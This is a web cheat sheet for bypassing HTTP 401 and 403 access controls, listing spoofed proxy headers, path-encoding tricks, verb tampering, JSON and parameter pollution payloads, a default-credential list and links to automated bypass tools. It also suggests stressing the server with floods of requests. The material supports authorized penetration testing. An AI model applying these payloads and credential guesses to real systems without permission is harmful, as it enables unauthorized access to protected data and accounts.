CheatSheetEthical hacking

401 & 403 Bypass CheatSheet For Ethical Hacker

2 years ago
2 years ago
3 mins
0 Comments

This 401 and 403 bypass cheat sheet is an essential guide for ethical hacker looking to bypass these common access control errors. We’ll cover manual techniques and popular automated tools, such as Bulk 403 Bypass, byp4xx, bypass-403, ForbiddenPass, and Burp Suite extensions. This resource is optimized for the key phrases “401 bypass cheatsheet” and “403 bypass cheatsheet.”

Manual Techniques for 401 and 403 Bypass

  1. Change HTTP Method: Experiment with different HTTP methods (GET, POST, PUT, DELETE) to bypass restrictions.
  2. Alter URL Encoding: Manipulate URL encoding using double URL encoding, Unicode encoding, or mixed encoding to bypass access control.
  3. Directory Traversal: Use “../” or “./” in the URL path to access restricted files and bypass directory restrictions.
  4. Add Trailing Slash: Append a trailing slash (“/”) at the end of the URL path to bypass access control.
  5. Case Manipulation: Modify the case of letters in the URL to bypass case-sensitive restrictions.
  6. HTTP Headers Manipulation: Tweak headers like X-Forwarded-For, X-Originating-IP, or Referer to bypass IP or referrer restrictions.
  7. URL Fragment: Attach a URL fragment (e.g., “#randomtext”) to bypass access control.

Automated Tools for 401 and 403 Bypass

  1. Bulk 403 Bypass: A Python script to automate testing for common 403 bypass techniques. Access the tool at https://github.com/aardwolfsecurityltd/bulk_403_bypass.
  2. byp4xx: A script that helps bypass 401 and 403 errors using various techniques. Find the tool at https://github.com/lobuhi/byp4xx.
  3. bypass-403: A Python-based tool designed to bypass 403 Forbidden errors. Access the tool at https://github.com/iamj0ker/bypass-403.
  4. ForbiddenPass: A tool focused on bypassing 403 Forbidden responses by testing different methods. Download the tool at https://github.com/gotr00t0day/forbiddenpass.
  5. Burp Suite Extensions: Enhance Burp Suite with extensions, such as Autorize, to help bypass 401 and 403 errors. Access the extension at https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122.

HTTP Verbs/Methods Fuzzing

Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

  • Check the response headers, maybe some information can be given. For example, a 200 response to HEAD with Content-Length: 55 means that the HEAD verb can access the info. But you still need to find a way to exfiltrate that info.
  • Using a HTTP header like X-HTTP-Method-Override: PUT can overwrite the verb used.
  • Use TRACE verb and if you are very lucky maybe in the response you can see also the headers added by intermediate proxies that might be useful.

HTTP Headers Fuzzing

  • Change Host header to some arbitrary value (that worked here)
  • Try to use other User Agents to access the resource.
  • Fuzz HTTP Headers: Try using HTTP Proxy Headers, HTTP Authentication Basic and NTLM brute-force (with a few combinations only) and other techniques. To do all of this I have created the tool fuzzhttpbypass.
    • X-Originating-IP: 127.0.0.1
    • X-Forwarded-For: 127.0.0.1
    • X-Forwarded: 127.0.0.1
    • Forwarded-For: 127.0.0.1
    • X-Remote-IP: 127.0.0.1
    • X-Remote-Addr: 127.0.0.1
    • X-ProxyUser-Ip: 127.0.0.1
    • X-Original-URL: 127.0.0.1
    • Client-IP: 127.0.0.1
    • True-Client-IP: 127.0.0.1
    • Cluster-Client-IP: 127.0.0.1
    • X-ProxyUser-Ip: 127.0.0.1
    • Host: localhost
    If the path is protected you can try to bypass the path protection using these other headers:
    • X-Original-URL: /admin/console
    • X-Rewrite-URL: /admin/console
  • If the page is behind a proxy, maybe it’s the proxy the one preventing you you to access the private information. Try abusing HTTP Request Smuggling or hop-by-hop headers.
  • Fuzz special HTTP headers looking for different response.
    • Fuzz special HTTP headers while fuzzing HTTP Methods.
  • Remove the Host header and maybe you will be able to bypass the protection.

Path Fuzzing

If /path is blocked:

  • Try using /%2e/path _(if the access is blocked by a proxy, this could bypass the protection). Try also_** /%252e**/path (double URL encode)
  • Try Unicode bypass: /%ef%bc%8fpath (The URL encoded chars are like “/”) so when encoded back it will be //path and maybe you will have already bypassed the /path name check
  • Other path bypasses:
    • site.com/secret –> HTTP 403 Forbidden
    • site.com/SECRET –> HTTP 200 OK
    • site.com/secret/ –> HTTP 200 OK
    • site.com/secret/. –> HTTP 200 OK
    • site.com//secret// –> HTTP 200 OK
    • site.com/./secret/.. –> HTTP 200 OK
    • site.com/;/secret –> HTTP 200 OK
    • site.com/.;/secret –> HTTP 200 OK
    • site.com//;//secret –> HTTP 200 OK
    • site.com/secret.json –> HTTP 200 OK (ruby)
    • Use all this list in the following situations:
      • /FUZZsecret
      • /FUZZ/secret
      • /secretFUZZ
  • Other API bypasses:
    • /v3/users_data/1234 –> 403 Forbidden
    • /v1/users_data/1234 –> 200 OK
    • {“id”:111} –> 401 Unauthriozied
    • {“id”:[111]} –> 200 OK
    • {“id”:111} –> 401 Unauthriozied
    • {“id”:{“id”:111}} –> 200 OK
    • {“user_id”:”<legit_id>”,”user_id”:”<victims_id>”} (JSON Parameter Pollution)
    • user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)

Protocol version

If using HTTP/1.1 try to use 1.0 or even test if it supports 2.0.

Other Bypasses

  • Get the IP or CNAME of the domain and try contacting it directly.
  • Try to stress the server sending common GET requests (It worked for this guy wit Facebook).
  • Change the protocol: from http to https, or for https to http
  • Go to https://archive.org/web/ and check if in the past that file was worldwide accessible.

Brute Force

  • Guess the password: Test the following common credentials. Do you know something about the victim? Or the CTF challenge name?
  • Brute force: Try basic, digest and NTLM auth.
Common Creds
```
admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest
```

Automatic Tools

Additional Resources for 401 and 403 Bypass

  1. OWASP: The Open Web Application Security Project (OWASP) provides a wealth of information on web application security, including guidance on bypassing access controls. Visit https://www.owasp.org for more information.
  2. HackTricks: An excellent resource for penetration testing techniques, including bypassing 401 and 403 errors. Access the guide at https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses.

Remember to always obtain proper authorization before conducting any penetration tests. This cheat sheet is intended for educational purposes and to enhance the security of web applications.

Tags:
Shares:

Leave a Reply

Your email address will not be published. Required fields are marked *